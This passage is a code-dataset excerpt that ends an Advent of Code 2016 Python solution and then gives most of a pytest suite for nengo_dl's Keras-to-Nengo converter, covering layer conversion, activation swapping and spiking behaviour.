aba(part)\n            else:\n                bracket_aba |= aba(part)\n        found_aba = False\n        for outside in bracket_aba:\n            for inside in non_bracket_aba:\n                if outside[0] == inside[1] and inside[0] == outside[1]:\n                    aba_count += 1\n                    found_aba = True\n                    break\n            if found_aba:\n                break\n\n    return 
abba_count,aba_count\n","repo_name":"sfmalloy/advent-of-code-2016","sub_path":"solutions/d07.py","file_name":"d07.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8504909005","text":"# pylint: disable=missing-docstring\n\nimport contextlib\n\nimport nengo\nimport numpy as np\nimport pytest\nimport tensorflow as tf\nfrom packaging import version\n\nfrom nengo_dl import compat, config, converter, utils\n\n\ndef _test_convert(inputs, outputs, inp_vals=None, **kwargs):\n kwargs.setdefault(\"allow_fallback\", False)\n\n model = tf.keras.Model(inputs=inputs, outputs=outputs)\n\n conv = converter.Converter(model, **kwargs)\n\n assert conv.verify(training=False, inputs=inp_vals)\n assert conv.verify(training=True, inputs=inp_vals)\n\n\ndef test_dense(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.Input(shape=(2, 2))\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(units=5, activation=\"relu\")(x)\n x = tf.keras.layers.Dense(units=6, bias_initializer=tf.initializers.ones())(x)\n x = tf.keras.layers.Dense(units=7, use_bias=False)(x)\n\n _test_convert(inp, x)\n\n\ndef test_conv(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.Input(shape=(16, 4))\n x = tf.keras.layers.Conv1D(filters=8, kernel_size=2, padding=\"same\")(x)\n x = tf.keras.layers.Reshape((4, 4, 8))(x)\n x = tf.keras.layers.Conv2D(filters=8, kernel_size=3, activation=\"sigmoid\")(x)\n x = tf.keras.layers.Reshape((4, 4, 2))(x)\n x = tf.keras.layers.Conv2D(filters=8, kernel_size=1, strides=2)(x)\n x = tf.keras.layers.Reshape((2, 2, 2, 4))(x)\n x = tf.keras.layers.Conv3D(filters=32, kernel_size=2)(x)\n if utils.tf_gpu_installed:\n x = tf.keras.layers.Reshape((2, 4, 4))(x)\n x = tf.keras.layers.Conv2D(\n filters=4, kernel_size=3, data_format=\"channels_first\"\n )(x)\n\n _test_convert(inp, x)\n\n\ndef test_conv_groups(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.Input(shape=(28, 28, 4))\n x = tf.keras.layers.Conv2D(filters=4, kernel_size=3, groups=4)(x)\n\n model = tf.keras.Model(inp, x)\n\n with contextlib.suppress() if compat.HAS_NENGO_3_2_1 else pytest.raises(\n TypeError, match=\"Convolution layers require Nengo>3.2.0\"\n ):\n # for some reason this crashes on the GPU\n with tf.device(\"/cpu:0\"):\n conv = converter.Converter(model, allow_fallback=False)\n\n assert conv.verify(training=False)\n # TODO: this fails on certain CPU platforms, seems to be a TF bug\n # assert conv.verify(training=True)\n\n\ndef test_activation():\n inp = x = tf.keras.Input(shape=(4,))\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Activation(tf.nn.relu)(x)\n x = tf.keras.layers.Activation(tf.keras.activations.relu)(x)\n x = tf.keras.layers.Activation(\"sigmoid\")(x)\n x = tf.keras.layers.Activation(tf.nn.sigmoid)(x)\n x = tf.keras.layers.Activation(tf.keras.activations.sigmoid)(x)\n if version.parse(nengo.__version__) >= version.parse(\"3.1.0\"):\n x = tf.keras.layers.Activation(\"tanh\")(x)\n x = tf.keras.layers.Activation(tf.nn.tanh)(x)\n x = tf.keras.layers.Activation(tf.keras.activations.tanh)(x)\n\n _test_convert(inp, x)\n\n inp = x = tf.keras.Input(shape=(4,))\n x = tf.keras.layers.Activation(tf.keras.activations.elu)(x)\n\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(TypeError, match=\"Unsupported activation type\"):\n converter.Converter(model, allow_fallback=False)\n\n with pytest.warns(UserWarning, match=\"falling back to a TensorNode\"):\n conv = 
converter.Converter(model, allow_fallback=True)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\n@pytest.mark.training\ndef test_fallback(Simulator):\n inp = x = tf.keras.Input(shape=(2, 2))\n\n class MyLayer(tf.keras.layers.Layer):\n def build(self, input_shape):\n super().build(input_shape)\n self.kernel = self.add_weight(\n shape=(), initializer=tf.initializers.RandomUniform()\n )\n\n def call(self, inputs):\n assert inputs.shape[1:] == (2, 2)\n return tf.reshape(\n inputs * tf.cast(self.kernel, inputs.dtype), shape=(-1, 4)\n )\n\n layer = MyLayer()\n x = layer(x)\n x = tf.keras.layers.Reshape((2, 2))(x)\n x = layer(x)\n x = tf.keras.layers.Reshape((2, 2))(x)\n x = layer(x)\n\n model = tf.keras.Model(inp, x)\n conv = converter.Converter(model, allow_fallback=True)\n\n with Simulator(conv.net) as sim:\n # check that weights are being shared correctly\n assert len(sim.keras_model.trainable_weights) == 1\n assert sim.keras_model.trainable_weights[0].shape == ()\n\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\ndef test_add():\n inp = [tf.keras.Input(shape=(2, 2)), tf.keras.Input(shape=(2, 2))]\n out = tf.keras.layers.Add()(inp)\n\n _test_convert(inp, out)\n\n\ndef test_average():\n inp = [tf.keras.Input(shape=(2, 2)), tf.keras.Input(shape=(2, 2))]\n out = tf.keras.layers.Average()(inp)\n\n _test_convert(inp, out)\n\n\ndef test_concatenate(rng):\n inp = [\n tf.keras.Input(shape=(1, 4)),\n tf.keras.Input(shape=(2, 4)),\n tf.keras.Input(shape=(3, 5)),\n ]\n x = tf.keras.layers.Concatenate(axis=1)(inp[:2])\n x = tf.keras.layers.Concatenate(axis=-1)([x, inp[2]])\n\n _test_convert(\n inp,\n x,\n inp_vals=[\n rng.uniform(size=(5, 1, 4)),\n rng.uniform(size=(5, 2, 4)),\n rng.uniform(size=(5, 3, 5)),\n ],\n )\n\n inp = [tf.keras.Input(shape=(1,)), tf.keras.Input(shape=(1,))]\n x = tf.keras.layers.Concatenate(axis=0)(inp)\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(TypeError, match=\"concatenate along batch dimension\"):\n converter.Converter(model, allow_fallback=False)\n\n\ndef test_zero_padding():\n inp = x = tf.keras.Input(shape=(14, 2))\n x = tf.keras.layers.ZeroPadding1D(padding=1)(x)\n x = tf.keras.layers.Reshape((4, 4, 2))(x)\n x = tf.keras.layers.ZeroPadding2D(padding=((2, 0), (0, 4)))(x)\n x = tf.keras.layers.Reshape((2, 2, 2, 12))(x)\n x = tf.keras.layers.ZeroPadding3D(padding=(1, 0, 3))(x)\n if utils.tf_gpu_installed:\n x = tf.keras.layers.Reshape((12, 8, 8))(x)\n x = tf.keras.layers.ZeroPadding2D(padding=1, data_format=\"channels_first\")(x)\n\n _test_convert(inp, x)\n\n\ndef test_batch_normalization(rng):\n inp = tf.keras.Input(shape=(4, 4, 3))\n out = []\n out.append(tf.keras.layers.BatchNormalization(axis=1)(inp))\n out.append(tf.keras.layers.BatchNormalization(axis=2)(inp))\n out.append(tf.keras.layers.BatchNormalization()(inp))\n out.append(tf.keras.layers.BatchNormalization(center=False, scale=False)(inp))\n\n model = tf.keras.Model(inputs=inp, outputs=out)\n\n # train it for a bit to initialize the moving averages\n model.compile(loss=tf.losses.mse, optimizer=tf.optimizers.SGD())\n model.fit(\n rng.uniform(size=(1024, 4, 4, 3)),\n [rng.uniform(size=(1024, 4, 4, 3))] * len(out),\n epochs=2,\n )\n\n inp_vals = [rng.uniform(size=(32, 4, 4, 3))]\n\n # test using tensornode fallback\n # TODO: there is some bug with using batchnormalization layers inside\n # nengo_dl.Layers in general (unrelated to converting)\n # conv = convert.Converter(allow_fallback=True, inference_only=False)\n # with pytest.warns(UserWarning, 
match=\"falling back to nengo_dl.Layer\"):\n # net = conv.convert(model)\n #\n # assert conv.verify(model, net, training=False, inputs=inp_vals)\n # assert conv.verify(model, net, training=True, inputs=inp_vals)\n\n # test actually converting to nengo objects\n conv = converter.Converter(model, allow_fallback=False, inference_only=True)\n\n assert conv.verify(training=False, inputs=inp_vals, atol=1e-7)\n\n with pytest.raises(ValueError, match=\"number of trainable parameters\"):\n # we don't expect the verification to pass for training=True, since we froze\n # the batch normalization in the nengo network (but not the keras model)\n conv.verify(training=True, inputs=inp_vals)\n\n # error if inference_only=False\n with pytest.raises(TypeError, match=\"unless inference_only=True\"):\n converter.Converter(model, allow_fallback=False, inference_only=False)\n\n # no error if inference_only=False but layer is not trainable\n inp = tf.keras.Input(shape=(4, 4, 3))\n out = tf.keras.layers.BatchNormalization(axis=1, trainable=False)(inp)\n model = tf.keras.Model(inp, out)\n conv = converter.Converter(model, inference_only=False, allow_fallback=False)\n conv.verify(training=True, inputs=inp_vals)\n\n\ndef test_relu():\n inp = tf.keras.Input(shape=(10,))\n out = tf.keras.layers.ReLU()(inp)\n\n _test_convert(inp, out, inp_vals=[np.linspace(-1, 1, 10)[None, :]])\n\n\ndef test_avg_pool(rng):\n n_filters = 6\n inp = tf.keras.Input(shape=(64, n_filters))\n outputs = [tf.keras.layers.AvgPool1D()(inp)]\n\n x = tf.keras.layers.Reshape((8, 8, n_filters))(inp)\n outputs.append(tf.keras.layers.AvgPool2D()(x))\n\n x = tf.keras.layers.Reshape((8, 8, n_filters))(inp)\n outputs.append(tf.keras.layers.AvgPool2D(pool_size=3, strides=2)(x))\n\n x = tf.keras.layers.Reshape((4, 4, 4, n_filters))(inp)\n outputs.append(tf.keras.layers.AvgPool3D()(x))\n\n if utils.tf_gpu_installed:\n x = tf.keras.layers.Reshape((n_filters, 8, 8))(inp)\n outputs.append(\n tf.keras.layers.AvgPool2D(\n pool_size=3, strides=2, data_format=\"channels_first\"\n )(x)\n )\n\n _test_convert(inp, outputs, inp_vals=[rng.uniform(size=(3, 64, n_filters))])\n\n\ndef test_global_avg_pool(rng):\n n_filters = 6\n inp = tf.keras.Input(shape=(64, n_filters))\n out0 = tf.keras.layers.GlobalAvgPool1D()(inp)\n\n x = tf.keras.layers.Reshape((8, 8, n_filters))(inp)\n out1 = tf.keras.layers.GlobalAvgPool2D()(x)\n\n x = tf.keras.layers.Reshape((n_filters, 8, 8))(inp)\n out2 = tf.keras.layers.GlobalAvgPool2D(data_format=\"channels_first\")(x)\n\n x = tf.keras.layers.Reshape((4, 4, 4, n_filters))(inp)\n out3 = tf.keras.layers.GlobalAvgPool3D()(x)\n\n _test_convert(\n inp, [out0, out1, out2, out3], inp_vals=[rng.uniform(size=(3, 64, n_filters))]\n )\n\n\n@pytest.mark.training\ndef test_densenet(Simulator, seed):\n tf.random.set_seed(seed)\n model = tf.keras.applications.densenet.DenseNet121(\n weights=None, include_top=False, input_shape=(112, 112, 3)\n )\n\n conv = converter.Converter(\n model, allow_fallback=False, max_to_avg_pool=True, inference_only=True\n )\n\n keras_params = 0\n for layer in model.layers:\n if not isinstance(\n layer, (compat.BatchNormalizationV1, compat.BatchNormalizationV2)\n ):\n for w in layer._trainable_weights:\n keras_params += np.prod(w.shape)\n\n # note: we don't expect any of the verification checks to pass, due to the\n # max_to_avg_pool swap, so just checking that the network structure has been\n # recreated\n with conv.net:\n # undo the inference_only=True so that parameters will be marked as\n # trainable (so that the check below 
will work)\n config.configure_settings(inference_only=False)\n\n with Simulator(conv.net) as sim:\n assert keras_params == sum(\n np.prod(w.shape) for w in sim.keras_model.trainable_weights\n )\n\n\ndef test_nested_network(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.layers.Input(shape=(4,))\n x = tf.keras.layers.Dense(units=10)(x)\n\n sub_sub_inp = tf.keras.Input(shape=(10, 1, 1))\n sub_sub_out = tf.keras.layers.Flatten()(sub_sub_inp)\n sub_sub_model = tf.keras.Model(sub_sub_inp, sub_sub_out, name=\"subsubmodel\")\n\n sub_inp0 = tf.keras.Input(shape=(10, 1))\n sub_inp1 = tf.keras.Input(shape=(10, 1))\n sub_add = tf.keras.layers.Add()([sub_inp0, sub_inp1])\n sub_out0 = tf.keras.layers.Reshape((10,))(sub_add)\n sub_out1 = tf.keras.layers.Reshape((10, 1, 1))(sub_add)\n sub_out1 = sub_sub_model(sub_out1)\n sub_model = tf.keras.Model(\n [sub_inp0, sub_inp1], [sub_out0, sub_out1], name=\"submodel\"\n )\n\n x = sub_model([x, x])\n x = sub_model(x)\n\n _test_convert(inp, x)\n\n\ndef test_repeated_layers(seed):\n inp = x = tf.keras.layers.Input(shape=(4,))\n layer = tf.keras.layers.Dense(units=4)\n x = layer(x)\n x = layer(x)\n x = layer(x)\n\n model = tf.keras.Model(inputs=inp, outputs=x)\n\n conv = converter.Converter(model, allow_fallback=False, split_shared_weights=True)\n\n assert conv.verify(training=False)\n with pytest.raises(ValueError, match=\"number of trainable parameters\"):\n # we don't expect the verification to pass for training=True, since we\n # split up the shared weights in the nengo network\n conv.verify(training=True)\n\n # error if split_shared_weights=False\n with pytest.raises(\n ValueError, match=\"not supported unless split_shared_weights=True\"\n ):\n converter.Converter(model, split_shared_weights=False)\n\n\ndef test_fan_in_out():\n a = tf.keras.layers.Input(shape=(1,))\n b = tf.keras.layers.Reshape((1, 1))\n c = tf.keras.layers.Reshape((1, 1, 1))\n d = tf.keras.layers.Reshape((1, 1, 1))\n\n x = d(a)\n y = d(x)\n z = d(y)\n\n outputs = [b(a), c(a), d(a), x, y, z]\n\n _test_convert(a, outputs)\n\n\ndef test_sequential(seed):\n tf.random.set_seed(seed)\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Dense(32, input_shape=(4,)))\n model.add(tf.keras.layers.Dense(32))\n\n conv = converter.Converter(model, allow_fallback=False)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\n@pytest.mark.parametrize(\n \"keras_activation, nengo_activation, swap\",\n [\n (tf.nn.sigmoid, nengo.RectifiedLinear(), {tf.nn.sigmoid: tf.nn.relu}),\n (\n tf.nn.relu,\n nengo.SpikingRectifiedLinear(),\n {tf.nn.relu: nengo.SpikingRectifiedLinear()},\n ),\n (tf.nn.relu, nengo.LIF(), {nengo.RectifiedLinear(): nengo.LIF()}),\n ],\n)\ndef test_activation_swap(\n Simulator, keras_activation, nengo_activation, swap, rng, seed\n):\n inp = x = tf.keras.Input(shape=(100,))\n x = tf.keras.layers.Activation(activation=keras_activation)(x)\n x = tf.keras.layers.Dense(\n units=100,\n activation=keras_activation,\n kernel_initializer=tf.initializers.constant(np.eye(100)),\n )(x)\n model = tf.keras.Model(inp, x)\n\n conv = converter.Converter(model, allow_fallback=False, swap_activations=swap)\n\n with nengo.Network() as net:\n net.config[nengo.Ensemble].neuron_type = nengo_activation\n net.config[nengo.Ensemble].gain = nengo.dists.Choice([1])\n net.config[nengo.Ensemble].bias = nengo.dists.Choice([0])\n net.config[nengo.Connection].synapse = None\n\n inp = nengo.Node(np.zeros(100))\n ens0 = nengo.Ensemble(100, 1)\n nengo.Connection(inp, ens0.neurons)\n\n ens1 
= nengo.Ensemble(100, 1)\n nengo.Connection(ens0.neurons, ens1.neurons)\n\n p = nengo.Probe(ens1.neurons)\n\n inp_vals = rng.uniform(size=(20, 50, 100))\n\n # set the seed so that initial voltages will be the same\n net.seed = seed\n conv.net.seed = seed\n\n with Simulator(net) as sim0:\n data0 = sim0.predict(inp_vals)\n\n with Simulator(conv.net) as sim1:\n data1 = sim1.predict(inp_vals)\n\n assert np.allclose(data0[p], data1[conv.outputs[model.outputs[0]]])\n\n\ndef test_max_pool(rng):\n inp = x = tf.keras.Input(shape=(4, 4, 2))\n x = tf.keras.layers.MaxPool2D()(x)\n\n model = tf.keras.Model(inp, x)\n\n with pytest.warns(UserWarning, match=\"consider setting max_to_avg_pool=True\"):\n conv = converter.Converter(model, max_to_avg_pool=False)\n\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n # can convert to avg pool, but then we don't expect output to match\n conv = converter.Converter(model, max_to_avg_pool=True, allow_fallback=False)\n with pytest.raises(ValueError, match=\"does not match output\"):\n conv.verify(training=False, inputs=[rng.uniform(size=(2, 4, 4, 2))])\n\n\ndef test_unsupported_args():\n inp = x = tf.keras.Input(shape=(4, 1))\n x = tf.keras.layers.Conv1D(1, 1, kernel_regularizer=tf.keras.regularizers.l1(0.1))(\n x\n )\n\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(\n TypeError,\n match=\"kernel_regularizer has value .* != None.*unless inference_only=True\",\n ):\n converter.Converter(model, allow_fallback=False)\n\n with pytest.warns(\n UserWarning,\n match=\"kernel_regularizer has value .* != None.*unless inference_only=True\",\n ):\n conv = converter.Converter(model, allow_fallback=True)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n inp = x = tf.keras.Input(shape=(4, 1))\n x = tf.keras.layers.Conv1D(1, 1, dilation_rate=(2,))(x)\n\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(TypeError, match=r\"dilation_rate has value \\(2,\\) != \\(1,\\)\"):\n converter.Converter(model, allow_fallback=False)\n\n with pytest.warns(UserWarning, match=r\"dilation_rate has value \\(2,\\) != \\(1,\\)\"):\n conv = converter.Converter(model, allow_fallback=True)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\ndef test_custom_converter():\n class AddOne(tf.keras.layers.Layer):\n def call(self, inputs):\n return inputs + 1\n\n @converter.Converter.register(AddOne)\n class ConvertAddOne(converter.LayerConverter):\n def convert(self, node_id):\n output = self.add_nengo_obj(node_id)\n self.add_connection(node_id, output)\n\n bias = nengo.Node([1] * output.size_in)\n conn = nengo.Connection(bias, output, synapse=None)\n self.set_trainable(conn, False)\n\n return output\n\n inp = x = tf.keras.Input(shape=(2, 2))\n x = AddOne()(x)\n\n _test_convert(inp, x)\n\n with pytest.warns(UserWarning, match=\"already has a converter\"):\n converter.Converter.register(AddOne)(ConvertAddOne)\n\n\ndef test_input():\n inp = x = tf.keras.Input(shape=(None, None, 2))\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(ValueError, match=\"must be fully specified\"):\n converter.Converter(model)\n\n\ndef test_nested_input():\n subinputs = (\n tf.keras.Input(shape=(2,), name=\"sub0\"),\n tf.keras.Input(shape=(2,), name=\"sub1\"),\n )\n x_0 = x = tf.keras.layers.Activation(tf.nn.relu)(subinputs[0])\n x = tf.keras.layers.Concatenate()([x, subinputs[1]])\n submodel = tf.keras.Model(subinputs, (x_0, x))\n\n inputs = (\n tf.keras.Input(shape=(2,), name=\"in0\"),\n tf.keras.Input(shape=(2,), name=\"in1\"),\n 
)\n x_0, x = submodel(inputs)\n x = tf.keras.layers.Concatenate()([x, x_0])\n\n _test_convert(inputs, x)\n\n\ndef test_leaky_relu(rng):\n inp = x = tf.keras.Input(shape=(4,))\n x = tf.keras.layers.ReLU(negative_slope=0.1)(x)\n x = tf.keras.layers.LeakyReLU(alpha=2)(x)\n\n _test_convert(inp, x, inp_vals=[rng.uniform(-1, 1, size=(32, 4))])\n\n\n@pytest.mark.parametrize(\n \"Layer, size, data_format\",\n [\n (tf.keras.layers.UpSampling1D, 3, None),\n (tf.keras.layers.UpSampling2D, (2, 2), \"channels_last\"),\n (tf.keras.layers.UpSampling2D, (3, 3), \"channels_first\"),\n (tf.keras.layers.UpSampling3D, (2, 3, 4), \"channels_first\"),\n ],\n)\ndef test_upsampling(Layer, size, data_format, rng):\n input_shape = (4,) * (len(size) if isinstance(size, tuple) else 1)\n if data_format is None or data_format == \"channels_last\":\n input_shape += (2,)\n else:\n input_shape = (2,) + input_shape\n inp = x = tf.keras.Input(shape=input_shape, batch_size=3)\n x = Layer(\n size=size, **({} if data_format is None else {\"data_format\": data_format})\n )(x)\n\n _test_convert(\n inp, x, inp_vals=[np.arange(np.prod(inp.get_shape())).reshape(inp.shape)]\n )\n\n\ndef test_scale_firing_rates():\n inp = tf.keras.Input(shape=(1,))\n x = tf.keras.layers.ReLU()(inp)\n model = tf.keras.Model(inp, x)\n\n # scaling doesn't affect output at all for non-spiking neurons\n conv = converter.Converter(model, scale_firing_rates=5)\n assert conv.verify()\n\n # works with existing amplitude values\n neuron_type = nengo.RectifiedLinear(amplitude=2)\n conv = converter.Converter(\n model,\n scale_firing_rates=5,\n swap_activations={nengo.RectifiedLinear(): neuron_type},\n )\n assert neuron_type.amplitude == 2\n assert conv.net.ensembles[0].neuron_type.amplitude == 2 / 5\n\n # warning when applying scaling to non-amplitude neuron type\n inp = tf.keras.Input(shape=(1,))\n x = tf.keras.layers.Activation(tf.nn.sigmoid)(inp)\n model = tf.keras.Model(inp, x)\n\n with pytest.warns(UserWarning, match=\"does not support amplitude\"):\n conv = converter.Converter(model, scale_firing_rates=5)\n\n with pytest.raises(ValueError, match=\"does not match output\"):\n conv.verify()\n\n\n@pytest.mark.parametrize(\n \"scale_firing_rates, expected_rates\",\n [(5, [5, 5]), ({1: 3, 2: 4}, [3, 4]), ({2: 3}, [1, 3])],\n)\ndef test_scale_firing_rates_cases(Simulator, scale_firing_rates, expected_rates):\n input_val = 100\n bias_val = 50\n n_steps = 100\n\n inp = tf.keras.Input(shape=(1,))\n x0 = tf.keras.layers.ReLU()(inp)\n x1 = tf.keras.layers.Dense(\n units=1,\n activation=tf.nn.relu,\n kernel_initializer=tf.initializers.constant([[1]]),\n bias_initializer=tf.initializers.constant([[bias_val]]),\n )(inp)\n model = tf.keras.Model(inp, [x0, x1])\n\n # convert indices to layers\n scale_firing_rates = (\n {model.layers[k]: v for k, v in scale_firing_rates.items()}\n if isinstance(scale_firing_rates, dict)\n else scale_firing_rates\n )\n\n conv = converter.Converter(\n model,\n swap_activations={tf.nn.relu: nengo.SpikingRectifiedLinear()},\n scale_firing_rates=scale_firing_rates,\n )\n\n with Simulator(conv.net) as sim:\n sim.run_steps(\n n_steps, data={conv.inputs[inp]: np.ones((1, n_steps, 1)) * input_val}\n )\n\n for i, p in enumerate(conv.net.probes):\n # spike heights are scaled down\n assert np.allclose(np.max(sim.data[p]), 1 / sim.dt / expected_rates[i])\n\n # number of spikes is scaled up\n assert np.allclose(\n np.count_nonzero(sim.data[p]),\n (input_val if i == 0 else input_val + bias_val)\n * expected_rates[i]\n * n_steps\n * sim.dt,\n atol=1,\n 
)\n\n\ndef test_layer_dicts():\n inp0 = tf.keras.Input(shape=(1,))\n inp1 = tf.keras.Input(shape=(1,))\n add = tf.keras.layers.Add()([inp0, inp1])\n dense_node = tf.keras.layers.Dense(units=1)(add)\n dense_ens = tf.keras.layers.Dense(units=1, activation=tf.nn.relu)(dense_node)\n\n model = tf.keras.Model([inp0, inp1], [dense_node, dense_ens])\n\n conv = converter.Converter(model)\n assert len(conv.inputs) == 2\n assert len(conv.outputs) == 2\n assert len(conv.layers) == 5\n\n # inputs/outputs/layers referencing the same stuff\n assert isinstance(conv.outputs[dense_node], nengo.Probe)\n assert conv.outputs[dense_node].target is conv.layers[dense_node]\n assert conv.inputs[inp0] is conv.layers[inp0]\n\n # look up by tensor\n assert isinstance(conv.layers[dense_node], nengo.Node)\n assert isinstance(conv.layers[dense_ens], nengo.ensemble.Neurons)\n\n # look up by layer\n assert isinstance(conv.layers[model.layers[-2]], nengo.Node)\n assert isinstance(conv.layers[model.layers[-1]], nengo.ensemble.Neurons)\n\n # iterating over dict works as expected\n for i, key in enumerate(conv.layers):\n assert model.layers.index(key[0]._wrapped._keras_history.layer) == i\n\n # applying the same layer multiple times\n inp = tf.keras.Input(shape=(1,))\n layer = tf.keras.layers.ReLU()\n x0 = layer(inp)\n x1 = layer(inp)\n\n model = tf.keras.Model(inp, [x0, x1])\n\n conv = converter.Converter(model, split_shared_weights=True)\n\n with pytest.raises(KeyError, match=\"has been called multiple times\"):\n assert conv.layers[layer]\n\n assert conv.outputs[x0].target is conv.layers[x0]\n assert conv.outputs[x1].target is conv.layers[x1]\n\n\ndef test_mid_model_output():\n \"\"\"\n Check that converter supports output tensors from the middle of the model.\n\n Previous converter put output tensors last in build order, so having an\n output tensor that needed to be built before non-output tensors was\n problematic. 
https://github.com/nengo/nengo-dl/pull/137\n    \"\"\"\n\n    # model must have at least three layers, with one layer in between outputs\n    inp = tf.keras.Input(shape=(1,))\n    x0 = tf.keras.layers.ReLU()(inp)\n    x1 = tf.keras.layers.ReLU()(x0)\n    x2 = tf.keras.layers.ReLU()(x1)\n\n    _test_convert(inp, [x0, x2], inp_vals=[np.ones((4, 1))])\n\n\ndef test_synapse():\n    inp = tf.keras.Input(shape=(1,))\n    dense0 = tf.keras.layers.Dense(units=10, activation=tf.nn.relu)(inp)\n    dense1 = tf.keras.layers.Dense(units=10, activation=None)(dense0)\n\n    model = tf.keras.Model(inp, [dense0, dense1])\n\n    conv = converter.Converter(model, synapse=0.1)\n\n    for conn in conv.net.all_connections:\n        if conn.pre is conv.layers[dense0]:\n            # synapse set on outputs from neurons\n            assert conn.synapse == nengo.Lowpass(0.1)\n        else:\n            # synapse not set on other connections\n            assert conn.synapse is None\n\n    # synapse set on neuron probe\n    assert conv.outputs[dense0].synapse == nengo.Lowpass(0.1)\n    # not set on non-neuron probe\n    assert conv.outputs[dense1].synapse is None\n\n\ndef test_dense_fallback_bias():\n    def relu(x):\n        return tf.maximum(x, 0)\n\n    inp = tf.keras.Input((1,))\n    out = tf.keras.layers.Dense(units=10, activation=relu)(inp)\n\n    _test_convert(inp, out, allow_fallback=True)\n\n    # double check that extra biases aren't added when we _are_ using an Ensemble\n    conv = converter.Converter(\n        tf.keras.Model(inp, out),\n        allow_fallback=False,\n        swap_activations={relu: nengo.RectifiedLinear()},\n    )\n    assert conv.verify(training=True)\n\n\ndef test_swap_activations_key_never_used():\n    \"\"\"Ensure warnings are thrown properly when there is an unused swap activations\n    key.\"\"\"\n\n    def relu(x):\n        return tf.maximum(x, 0)\n\n    def relu2(x):\n        return tf.maximum(x, 0)\n\n    inp = tf.keras.Input((1,))\n    out = tf.keras.layers.Dense(units=10, activation=relu)(inp)\n\n    # Test that swap_activations are throwing warnings when not used\n    with pytest.warns(UserWarning, match=\"no layers in the model with that activation\"):\n        conv = converter.Converter(\n            tf.keras.Model(inp, out),\n            allow_fallback=False,\n            swap_activations={\n                relu: nengo.RectifiedLinear(),\n                relu2: nengo.RectifiedLinear(),\n            },\n        )\n    assert conv.swap_activations.unused_keys() == {relu2}\n\n    # Test that there is no warning if all keys are used\n    inp = tf.keras.Input((1,))\n    out = tf.keras.layers.Dense(units=10, activation=relu)(inp)\n    out = tf.keras.layers.Dense(units=10, activation=relu2)(out)\n    with pytest.warns(None) as recwarns:\n        conv = converter.Converter(\n            tf.keras.Model(inp, out),\n            allow_fallback=False,\n            swap_activations={\n                relu: nengo.RectifiedLinear(),\n                relu2: nengo.RectifiedLinear(),\n                nengo.RectifiedLinear(): nengo.SpikingRectifiedLinear(),\n            },\n        )\n    assert not any(\n        \"no layers in the model with that activation\" in str(w.message) for w in recwarns\n    )\n    assert len(conv.swap_activations.unused_keys()) == 0\n\n    # check swap_activations dict functions\n    assert len(conv.swap_activations) == 3\n    assert set(conv.swap_activations.keys()) == {relu, relu2, nengo.RectifiedLinear()}\n\n\n@pytest.mark.skipif(\n    version.parse(nengo.__version__) <= version.parse(\"3.0.0\"),\n    reason=\"Nengo 3.1 required to convert SpikingActivation layers\",\n)\ndef test_spiking_activation(Simulator, seed, rng, pytestconfig):\n    keras_spiking = pytest.importorskip(\"keras_spiking\")\n\n    inp_val = rng.uniform(0, 2, size=(1, 100, 10))\n\n    inp = x = tf.keras.Input((None, 10))\n    x = tf.keras.layers.Dense(units=10)(x)\n    x = keras_spiking.SpikingActivation(\n        \"relu\", seed=seed, 
spiking_aware_training=False\n )(x)\n\n # note: it will not match for batch_size > 1, because keras-spiking generates\n # a different initial state for each batch element, which is not possible in nengo\n model = tf.keras.Model(inp, x)\n conv = converter.Converter(model, temporal_model=True)\n assert conv.verify(training=False, inputs=[inp_val])\n assert conv.verify(training=True, inputs=[inp_val])\n\n # check non-default dt\n inp = x = tf.keras.Input((None, 10))\n x = keras_spiking.SpikingActivation(\"relu\", dt=1, seed=seed)(x)\n model = tf.keras.Model(inp, x)\n keras_out = model.predict(inp_val)\n\n with pytest.warns(UserWarning, match=\"dt will be controlled by Simulator\"):\n conv = converter.Converter(model, inference_only=True, temporal_model=True)\n\n with Simulator(conv.net, dt=1) as sim:\n nengo_out = sim.predict(inp_val)\n\n assert np.allclose(keras_out, nengo_out[conv.outputs[x]])\n\n # check statefulness\n inp = x = tf.keras.Input((None, 10), batch_size=1)\n x = keras_spiking.SpikingActivation(\"relu\", dt=1, seed=seed, stateful=True)(x)\n model = tf.keras.Model(inp, x)\n\n with pytest.warns(\n UserWarning, match=\"statefulness will be controlled by Simulator\"\n ):\n conv = converter.Converter(model, inference_only=True, temporal_model=True)\n\n if version.parse(tf.__version__) >= version.parse(\"2.4.0rc0\"):\n # TensorFlow bug prevents this from working prior to 2.4, see\n # https://github.com/tensorflow/tensorflow/issues/42193\n keras_out0 = model.predict(inp_val)\n keras_out1 = model.predict(inp_val)\n\n with Simulator(conv.net, dt=1) as sim:\n nengo_out0 = sim.predict(inp_val, stateful=True)\n nengo_out1 = sim.predict(inp_val, stateful=True)\n\n assert not np.allclose(keras_out0, keras_out1)\n assert np.allclose(keras_out0, nengo_out0[conv.outputs[x]])\n assert np.allclose(keras_out1, nengo_out1[conv.outputs[x]])\n\n # error if wrapped activation is not supported\n inp = tf.keras.Input((None, 10))\n x = keras_spiking.SpikingActivation(\"elu\")(inp)\n model = tf.keras.Model(inp, x)\n with pytest.raises(TypeError, match=\"does not have a native Nengo equivalent\"):\n converter.Converter(model, temporal_model=True, inference_only=True)\n\n # does not support fallbacks\n inp = tf.keras.Input((None, 10))\n x = keras_spiking.SpikingActivation(\"relu\", spiking_aware_training=True)(inp)\n model = tf.keras.Model(inp, x)\n with pytest.raises(\n TypeError, match=\"spiking_aware_training has value True != 